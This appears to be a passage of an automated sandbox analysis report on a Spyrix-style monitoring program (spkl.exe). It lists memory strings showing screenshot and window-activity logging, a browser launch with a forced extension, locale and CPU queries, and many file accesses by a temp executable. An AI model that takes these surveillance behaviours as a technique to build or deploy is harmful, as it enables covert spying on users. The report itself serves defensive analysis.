Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: USCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000002.2971872040.000000000455D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}zationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://dashboard.spyrix.com/";
Source: spkl.exe, 00000035.00000002.2977775602.0000000006520000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000003.2779605523.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2971872040.0000000004501000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}."
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2974675344.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: explorer.exe;Program Manager
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager02 00:12:01.02
Source: spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )2024-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}Q
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerP#
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0082075116;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:00.1520""
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000003.2779605523.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}00L#
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SSCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;userd"P
Source: spkl.exe, 00000035.00000002.2977775602.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: s{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}

Contains functionality to query CPU information (cpuid)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00ECEE90 cpuid

67_2_00ECEE90

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	53_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	53_2_0040A298
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	53_2_033C4CB8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	53_2_033C4D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetLocaleInfoA,	53_2_033C9C9C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
